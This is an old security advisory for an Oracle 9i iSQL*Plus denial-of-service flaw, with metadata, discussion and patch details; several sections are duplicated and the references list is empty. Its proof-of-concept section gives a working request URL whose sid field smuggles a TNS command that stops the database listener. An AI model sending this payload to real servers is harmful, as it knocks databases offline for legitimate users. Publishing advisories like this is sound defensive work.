Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
BID:15032
Info
Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
| Bugtraq ID: | 15032 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 07 2005 12:00AM |
| Updated: | Oct 07 2005 12:00AM |
| Credit: | Alexander Kornbrust <[email protected]> from Red-Database-Security is credited with the discovery of this issue. |
| Vulnerable: |
Oracle Oracle9i Standard Edition 9.0 .2.4 Oracle Oracle9i Personal Edition 9.0 .2.4 Oracle Oracle9i Enterprise Edition 9.0 .2.4 |
| Not Vulnerable: | |
Discussion
Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.
These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID.
Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.
These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID.
Exploit / POC
Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
An exploit is not required.
The following proof of concept example is available:
http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon
An exploit is not required.
The following proof of concept example is available:
http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon
Solution / Fix
Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
Solution:
Oracle has released a Critical Patch Update (Critical Patch Update - July 2005) to address this issue. Information regarding obtaining and applying an appropriate patch can be found in the Oracle Critical Patch Update in references.
Solution:
Oracle has released a Critical Patch Update (Critical Patch Update - July 2005) to address this issue. Information regarding obtaining and applying an appropriate patch can be found in the Oracle Critical Patch Update in references.
References
Oracle iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability
References:
References: